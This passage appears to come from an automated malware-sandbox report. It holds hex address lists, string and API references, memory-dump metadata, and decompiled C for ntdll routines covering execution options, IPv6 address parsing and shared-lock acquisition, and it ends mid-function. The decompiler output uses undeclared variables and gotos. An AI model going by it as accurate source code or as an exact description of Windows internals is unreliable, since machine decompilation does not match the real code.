                                                                                                                                                                                    0x00893f6c
                                                                                                                                                                                    0x00893f6d
                                                                                                                                                                                    0x00893f6f
                                                                                                                                                                                    0x0089e304
                                                                                                                                                                                    0x0089e30f
                                                                                                                                                                                    0x0089e315
                                                                                                                                                                                    0x0089e31e
                                                                                                                                                                                    0x0089e321
                                                                                                                                                                                    0x0089e327
                                                                                                                                                                                    0x0089e329
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0089e32f
                                                                                                                                                                                    0x0089e32f
                                                                                                                                                                                    0x0089e337
                                                                                                                                                                                    0x0089e33a
                                                                                                                                                                                    0x0089e33b
                                                                                                                                                                                    0x0089e33d
                                                                                                                                                                                    0x0089e33f
                                                                                                                                                                                    0x0089e341
                                                                                                                                                                                    0x0089e341
                                                                                                                                                                                    0x0089e34e
                                                                                                                                                                                    0x0089e353
                                                                                                                                                                                    0x0089e358
                                                                                                                                                                                    0x0089e35d
                                                                                                                                                                                    0x0089e35f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0089e365
                                                                                                                                                                                    0x0089e365
                                                                                                                                                                                    0x0089e368
                                                                                                                                                                                    0x0089e36e
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0089e374
                                                                                                                                                                                    0x0089e32f
                                                                                                                                                                                    0x00893f75
                                                                                                                                                                                    0x00893f7a
                                                                                                                                                                                    0x00893f7c
                                                                                                                                                                                    0x00893f7e
                                                                                                                                                                                    0x00893f86
                                                                                                                                                                                    0x00877f39
                                                                                                                                                                                    0x00877f47
                                                                                                                                                                                    0x00877f47
                                                                                                                                                                                    0x00877f37
                                                                                                                                                                                    0x00877f37
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00893F12
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0089E345
                                                                                                                                                                                    • Execute=1, xrefs: 00893F5E
                                                                                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0089E2FB
                                                                                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00893EC4
                                                                                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00893F75
                                                                                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00893F4A
                                                                                                                                                                                    • Wktw, xrefs: 00877F08
                                                                                                                                                                                    • ExecuteOptions, xrefs: 00893F04
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BaseDataModuleQuery
                                                                                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions$Wktw
                                                                                                                                                                                    • API String ID: 3901378454-3161390013
                                                                                                                                                                                    • Opcode ID: 542439d9e149c1e3b9d5cb01d502be00908f349b337a0a149e2cd94b3a86c7de
                                                                                                                                                                                    • Instruction ID: e582489087936b2a4566a614cd051dbfb65c1ac27f63b148dac223fcba995ee8
                                                                                                                                                                                    • Opcode Fuzzy Hash: 542439d9e149c1e3b9d5cb01d502be00908f349b337a0a149e2cd94b3a86c7de
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4841B771A8421C7ADF20EA94DCC6FEA73BCFB15700F0445A9F509E6181EA70DB45CB61
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E00880B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                    				void* _t108;
                                                                                                                                                                                    				void* _t116;
                                                                                                                                                                                    				char _t120;
                                                                                                                                                                                    				short _t121;
                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                    				intOrPtr* _t130;
                                                                                                                                                                                    				char _t132;
                                                                                                                                                                                    				short _t133;
                                                                                                                                                                                    				intOrPtr _t141;
                                                                                                                                                                                    				signed int _t156;
                                                                                                                                                                                    				signed int _t174;
                                                                                                                                                                                    				intOrPtr _t177;
                                                                                                                                                                                    				intOrPtr* _t179;
                                                                                                                                                                                    				intOrPtr _t180;
                                                                                                                                                                                    				void* _t183;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t179 = _a4;
                                                                                                                                                                                    				_t141 =  *_t179;
                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                    				_v28 = 0;
                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                    				_v24 = 0;
                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                    				_v32 = 0;
                                                                                                                                                                                    				_v20 = 0;
                                                                                                                                                                                    				if(_t141 == 0) {
                                                                                                                                                                                    					L41:
                                                                                                                                                                                    					 *_a8 = _t179;
                                                                                                                                                                                    					_t180 = _v24;
                                                                                                                                                                                    					if(_t180 != 0) {
                                                                                                                                                                                    						if(_t180 != 3) {
                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_v8 = _v8 + 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t174 = _v32;
                                                                                                                                                                                    					if(_t174 == 0) {
                                                                                                                                                                                    						if(_v8 == 7) {
                                                                                                                                                                                    							goto L43;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					L43:
                                                                                                                                                                                    					if(_v16 != 1) {
                                                                                                                                                                                    						if(_v16 != 2) {
                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                    						L47:
                                                                                                                                                                                    						if(_t174 != 0) {
                                                                                                                                                                                    							E00858980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
                                                                                                                                                                                    							_t116 = 8;
                                                                                                                                                                                    							E0084DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
                                                                                                                                                                                    						}
                                                                                                                                                                                    						return 0;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_t180 != 0) {
                                                                                                                                                                                    						if(_v12 > 3) {
                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t120 = E00880CFA(_v28, 0, 0xa);
                                                                                                                                                                                    						_t183 = _t183 + 0xc;
                                                                                                                                                                                    						if(_t120 > 0xff) {
                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
                                                                                                                                                                                    						goto L47;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					if(_v12 > 4) {
                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t121 = E00880CFA(_v28, _t180, 0x10);
                                                                                                                                                                                    					_t183 = _t183 + 0xc;
                                                                                                                                                                                    					 *((short*)(_a12 + _v20 * 2)) = _t121;
                                                                                                                                                                                    					goto L47;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						_t123 = _v16;
                                                                                                                                                                                    						if(_t123 == 0) {
                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t108 = _t123 - 1;
                                                                                                                                                                                    						if(_t108 != 0) {
                                                                                                                                                                                    							goto L1;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t178 = _t141;
                                                                                                                                                                                    						if(E008806BA(_t108, _t141) == 0 || _t135 == 0) {
                                                                                                                                                                                    							if(E008806BA(_t135, _t178) == 0 || E00880A5B(_t136, _t178) == 0) {
                                                                                                                                                                                    								if(_t141 != 0x3a) {
                                                                                                                                                                                    									if(_t141 == 0x2e) {
                                                                                                                                                                                    										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
                                                                                                                                                                                    											goto L41;
                                                                                                                                                                                    										} else {
                                                                                                                                                                                    											_v24 = _v24 + 1;
                                                                                                                                                                                    											L27:
                                                                                                                                                                                    											_v16 = _v16 & 0x00000000;
                                                                                                                                                                                    											L28:
                                                                                                                                                                                    											if(_v28 == 0) {
                                                                                                                                                                                    												goto L20;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											_t177 = _v24;
                                                                                                                                                                                    											if(_t177 != 0) {
                                                                                                                                                                                    												if(_v12 > 3) {
                                                                                                                                                                                    													L6:
                                                                                                                                                                                    													return 0xc000000d;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												_t132 = E00880CFA(_v28, 0, 0xa);
                                                                                                                                                                                    												_t183 = _t183 + 0xc;
                                                                                                                                                                                    												if(_t132 > 0xff) {
                                                                                                                                                                                    													goto L6;
                                                                                                                                                                                    												}
                                                                                                                                                                                    												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
                                                                                                                                                                                    												goto L20;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											if(_v12 > 4) {
                                                                                                                                                                                    												goto L6;
                                                                                                                                                                                    											}
                                                                                                                                                                                    											_t133 = E00880CFA(_v28, 0, 0x10);
                                                                                                                                                                                    											_t183 = _t183 + 0xc;
                                                                                                                                                                                    											_v20 = _v20 + 1;
                                                                                                                                                                                    											 *((short*)(_a12 + _v20 * 2)) = _t133;
                                                                                                                                                                                    											goto L20;
                                                                                                                                                                                    										}
                                                                                                                                                                                    									}
                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								if(_v24 > 0 || _v8 > 6) {
                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                    								} else {
                                                                                                                                                                                    									_t130 = _t179 + 1;
                                                                                                                                                                                    									if( *_t130 == _t141) {
                                                                                                                                                                                    										if(_v32 != 0) {
                                                                                                                                                                                    											goto L41;
                                                                                                                                                                                    										}
                                                                                                                                                                                    										_v32 = _v8 + 1;
                                                                                                                                                                                    										_t156 = 2;
                                                                                                                                                                                    										_v8 = _v8 + _t156;
                                                                                                                                                                                    										L34:
                                                                                                                                                                                    										_t179 = _t130;
                                                                                                                                                                                    										_v16 = _t156;
                                                                                                                                                                                    										goto L28;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_v8 = _v8 + 1;
                                                                                                                                                                                    									goto L27;
                                                                                                                                                                                    								}
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_v12 = _v12 + 1;
                                                                                                                                                                                    								if(_v24 > 0) {
                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_a7 = 1;
                                                                                                                                                                                    								goto L20;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_v12 = _v12 + 1;
                                                                                                                                                                                    							L20:
                                                                                                                                                                                    							_t179 = _t179 + 1;
                                                                                                                                                                                    							_t141 =  *_t179;
                                                                                                                                                                                    							if(_t141 == 0) {
                                                                                                                                                                                    								goto L41;
                                                                                                                                                                                    							}
                                                                                                                                                                                    							continue;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						L7:
                                                                                                                                                                                    						if(_t141 == 0x3a) {
                                                                                                                                                                                    							if(_v24 > 0 || _v8 > 0) {
                                                                                                                                                                                    								goto L41;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t130 = _t179 + 1;
                                                                                                                                                                                    								if( *_t130 != _t141) {
                                                                                                                                                                                    									goto L41;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								_v20 = _v20 + 1;
                                                                                                                                                                                    								_t156 = 2;
                                                                                                                                                                                    								_v32 = 1;
                                                                                                                                                                                    								_v8 = _t156;
                                                                                                                                                                                    								 *((short*)(_a12 + _v20 * 2)) = 0;
                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						}
                                                                                                                                                                                    						L8:
                                                                                                                                                                                    						if(_v8 > 7) {
                                                                                                                                                                                    							goto L41;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						_t142 = _t141;
                                                                                                                                                                                    						if(E008806BA(_t123, _t141) == 0 || _t124 == 0) {
                                                                                                                                                                                    							if(E008806BA(_t124, _t142) == 0 || E00880A5B(_t125, _t142) == 0 || _v24 > 0) {
                                                                                                                                                                                    								goto L41;
                                                                                                                                                                                    							} else {
                                                                                                                                                                                    								_t128 = 1;
                                                                                                                                                                                    								_a7 = 1;
                                                                                                                                                                                    								_v28 = _t179;
                                                                                                                                                                                    								_v16 = 1;
                                                                                                                                                                                    								_v12 = 1;
                                                                                                                                                                                    								L39:
                                                                                                                                                                                    								if(_v16 == _t128) {
                                                                                                                                                                                    									goto L20;
                                                                                                                                                                                    								}
                                                                                                                                                                                    								goto L28;
                                                                                                                                                                                    							}
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							_a7 = 0;
                                                                                                                                                                                    							_v28 = _t179;
                                                                                                                                                                                    							_v16 = 1;
                                                                                                                                                                                    							_v12 = 1;
                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                    						}
                                                                                                                                                                                    					}
                                                                                                                                                                                    				}
                                                                                                                                                                                    				L1:
                                                                                                                                                                                    				_t123 = _t108 == 1;
                                                                                                                                                                                    				if(_t108 == 1) {
                                                                                                                                                                                    					goto L8;
                                                                                                                                                                                    				}
                                                                                                                                                                                    				_t128 = 1;
                                                                                                                                                                                    				goto L39;
                                                                                                                                                                                    			}

























                                                                                                                                                                                    0x00880b21
                                                                                                                                                                                    0x00880b24
                                                                                                                                                                                    0x00880b27
                                                                                                                                                                                    0x00880b2a
                                                                                                                                                                                    0x00880b2d
                                                                                                                                                                                    0x00880b30
                                                                                                                                                                                    0x00880b33
                                                                                                                                                                                    0x00880b36
                                                                                                                                                                                    0x00880b39
                                                                                                                                                                                    0x00880b3e
                                                                                                                                                                                    0x00880c65
                                                                                                                                                                                    0x00880c68
                                                                                                                                                                                    0x00880c6a
                                                                                                                                                                                    0x00880c6f
                                                                                                                                                                                    0x008aeb42
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeb48
                                                                                                                                                                                    0x008aeb48
                                                                                                                                                                                    0x00880c75
                                                                                                                                                                                    0x00880c7a
                                                                                                                                                                                    0x008aeb54
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeb5a
                                                                                                                                                                                    0x00880c80
                                                                                                                                                                                    0x00880c84
                                                                                                                                                                                    0x008aeb98
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeba6
                                                                                                                                                                                    0x00880cb8
                                                                                                                                                                                    0x00880cba
                                                                                                                                                                                    0x00880cd3
                                                                                                                                                                                    0x00880cda
                                                                                                                                                                                    0x00880ce4
                                                                                                                                                                                    0x00880ce9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880cec
                                                                                                                                                                                    0x00880c8c
                                                                                                                                                                                    0x008aeb63
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeb70
                                                                                                                                                                                    0x008aeb75
                                                                                                                                                                                    0x008aeb7d
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeb8c
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeb8c
                                                                                                                                                                                    0x00880c96
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880ca2
                                                                                                                                                                                    0x00880cac
                                                                                                                                                                                    0x00880cb4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880b44
                                                                                                                                                                                    0x00880b47
                                                                                                                                                                                    0x00880b49
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880b4f
                                                                                                                                                                                    0x00880b50
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880b56
                                                                                                                                                                                    0x00880b62
                                                                                                                                                                                    0x00880b7c
                                                                                                                                                                                    0x00880bac
                                                                                                                                                                                    0x00880a0f
                                                                                                                                                                                    0x008aeaaa
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeac4
                                                                                                                                                                                    0x008aeac4
                                                                                                                                                                                    0x00880bd0
                                                                                                                                                                                    0x00880bd0
                                                                                                                                                                                    0x00880bd4
                                                                                                                                                                                    0x00880bd9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880bdb
                                                                                                                                                                                    0x00880be0
                                                                                                                                                                                    0x008aeb0e
                                                                                                                                                                                    0x00880a1a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880a1a
                                                                                                                                                                                    0x008aeb1a
                                                                                                                                                                                    0x008aeb1f
                                                                                                                                                                                    0x008aeb27
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeb36
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeb36
                                                                                                                                                                                    0x00880bea
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880bf6
                                                                                                                                                                                    0x00880c00
                                                                                                                                                                                    0x00880c03
                                                                                                                                                                                    0x00880c0b
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880c0b
                                                                                                                                                                                    0x008aeaaa
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880a15
                                                                                                                                                                                    0x00880bb6
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880bc6
                                                                                                                                                                                    0x00880bc6
                                                                                                                                                                                    0x00880bcb
                                                                                                                                                                                    0x00880c15
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880c1d
                                                                                                                                                                                    0x00880c20
                                                                                                                                                                                    0x00880c21
                                                                                                                                                                                    0x00880c24
                                                                                                                                                                                    0x00880c24
                                                                                                                                                                                    0x00880c26
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880c26
                                                                                                                                                                                    0x00880bcd
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880bcd
                                                                                                                                                                                    0x00880b89
                                                                                                                                                                                    0x00880b89
                                                                                                                                                                                    0x00880b90
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880b96
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880b96
                                                                                                                                                                                    0x00880a04
                                                                                                                                                                                    0x00880a04
                                                                                                                                                                                    0x00880b9a
                                                                                                                                                                                    0x00880b9a
                                                                                                                                                                                    0x00880b9b
                                                                                                                                                                                    0x00880b9f
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880ba5
                                                                                                                                                                                    0x00880ac7
                                                                                                                                                                                    0x00880aca
                                                                                                                                                                                    0x008aeacf
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeade
                                                                                                                                                                                    0x008aeade
                                                                                                                                                                                    0x008aeae3
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeaf3
                                                                                                                                                                                    0x008aeaf6
                                                                                                                                                                                    0x008aeaf7
                                                                                                                                                                                    0x008aeafe
                                                                                                                                                                                    0x008aeb01
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeb01
                                                                                                                                                                                    0x008aeacf
                                                                                                                                                                                    0x00880ad0
                                                                                                                                                                                    0x00880ad4
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880ada
                                                                                                                                                                                    0x00880ae6
                                                                                                                                                                                    0x00880c34
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880c47
                                                                                                                                                                                    0x00880c49
                                                                                                                                                                                    0x00880c4a
                                                                                                                                                                                    0x00880c4e
                                                                                                                                                                                    0x00880c51
                                                                                                                                                                                    0x00880c54
                                                                                                                                                                                    0x00880c57
                                                                                                                                                                                    0x00880c5a
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880c60
                                                                                                                                                                                    0x00880afb
                                                                                                                                                                                    0x00880afe
                                                                                                                                                                                    0x00880b02
                                                                                                                                                                                    0x00880b05
                                                                                                                                                                                    0x00880b08
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00880b08
                                                                                                                                                                                    0x00880ae6
                                                                                                                                                                                    0x00880b44
                                                                                                                                                                                    0x008809f8
                                                                                                                                                                                    0x008809f8
                                                                                                                                                                                    0x008809f9
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x008aeaa0
                                                                                                                                                                                    0x00000000

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140617849.0000000000830000.00000040.00000001.sdmp, Offset: 00820000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140611849.0000000000820000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140700435.0000000000910000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140704970.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140713150.0000000000924000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140718095.0000000000927000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140724464.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140759164.0000000000990000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: __fassign
                                                                                                                                                                                    • String ID: .$:$:
                                                                                                                                                                                    • API String ID: 3965848254-2308638275
                                                                                                                                                                                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction ID: cfcbb6ca97f2228bade5fefad9ffaad215e8d966836af962544c970eb6306040
                                                                                                                                                                                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                                                                                                                                                    • Instruction Fuzzy Hash: 49A1BD31D0030ADFDBA4EFA8C8446AEB7B6FF05315F24846ED812E7242D6309A49CF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                    			E00880554(signed int _a4, char _a8) {
                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                    				signed int* _t49;
                                                                                                                                                                                    				signed int _t51;
                                                                                                                                                                                    				signed int _t56;
                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                    				signed int _t63;
                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                    				intOrPtr _t67;
                                                                                                                                                                                    				void* _t69;
                                                                                                                                                                                    				signed int _t70;
                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                    				signed int _t96;
                                                                                                                                                                                    				intOrPtr _t105;
                                                                                                                                                                                    				signed int _t107;
                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                    				signed int _t115;
                                                                                                                                                                                    				signed int* _t119;
                                                                                                                                                                                    				void* _t125;
                                                                                                                                                                                    				void* _t126;
                                                                                                                                                                                    				signed int _t128;
                                                                                                                                                                                    				signed int _t130;
                                                                                                                                                                                    				signed int _t138;
                                                                                                                                                                                    				signed int _t144;
                                                                                                                                                                                    				void* _t158;
                                                                                                                                                                                    				void* _t159;
                                                                                                                                                                                    				void* _t160;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t96 = _a4;
                                                                                                                                                                                    				_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                    				_push(_t138);
                                                                                                                                                                                    				if(_t115 < 0) {
                                                                                                                                                                                    					_t105 =  *[fs:0x18];
                                                                                                                                                                                    					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
                                                                                                                                                                                    					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
                                                                                                                                                                                    						goto L6;
                                                                                                                                                                                    					} else {
                                                                                                                                                                                    						__eflags = _t115 | 0xffffffff;
                                                                                                                                                                                    						asm("lock xadd [eax], edx");
                                                                                                                                                                                    						return 1;
                                                                                                                                                                                    					}
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					L6:
                                                                                                                                                                                    					_push(_t128);
                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                    						L7:
                                                                                                                                                                                    						__eflags = _t115;
                                                                                                                                                                                    						if(_t115 >= 0) {
                                                                                                                                                                                    							break;
                                                                                                                                                                                    						}
                                                                                                                                                                                    						__eflags = _a8;
                                                                                                                                                                                    						if(_a8 == 0) {
                                                                                                                                                                                    							__eflags = 0;
                                                                                                                                                                                    							return 0;
                                                                                                                                                                                    						} else {
                                                                                                                                                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
                                                                                                                                                                                    							_t49 = _t96 + 0x1c;
                                                                                                                                                                                    							_t106 = 1;
                                                                                                                                                                                    							asm("lock xadd [edx], ecx");
                                                                                                                                                                                    							_t115 =  *(_t96 + 0x28);
                                                                                                                                                                                    							__eflags = _t115;
                                                                                                                                                                                    							if(_t115 < 0) {
                                                                                                                                                                                    								L23:
                                                                                                                                                                                    								_t130 = 0;
                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                    								while(1) {
                                                                                                                                                                                    									_t118 =  *(_t96 + 0x30) & 0x00000001;
                                                                                                                                                                                    									asm("sbb esi, esi");
                                                                                                                                                                                    									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009201c0;
                                                                                                                                                                                    									_push(_t144);
                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                    									_t51 = E0083F8CC( *((intOrPtr*)(_t96 + 0x18)));
                                                                                                                                                                                    									__eflags = _t51 - 0x102;
                                                                                                                                                                                    									if(_t51 != 0x102) {
                                                                                                                                                                                    										break;
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_t106 =  *(_t144 + 4);
                                                                                                                                                                                    									_t126 =  *_t144;
                                                                                                                                                                                    									_t86 = E00884FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
                                                                                                                                                                                    									_push(_t126);
                                                                                                                                                                                    									_push(_t86);
                                                                                                                                                                                    									E00893F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
                                                                                                                                                                                    									E00893F92(0x65, 0, "RTL: Resource at %p\n", _t96);
                                                                                                                                                                                    									_t130 = _t130 + 1;
                                                                                                                                                                                    									_t160 = _t158 + 0x28;
                                                                                                                                                                                    									__eflags = _t130 - 2;
                                                                                                                                                                                    									if(__eflags > 0) {
                                                                                                                                                                                    										E008C217A(_t106, __eflags, _t96);
                                                                                                                                                                                    									}
                                                                                                                                                                                    									_push("RTL: Re-Waiting\n");
                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                    									_push(0x65);
                                                                                                                                                                                    									E00893F92();
                                                                                                                                                                                    									_t158 = _t160 + 0xc;
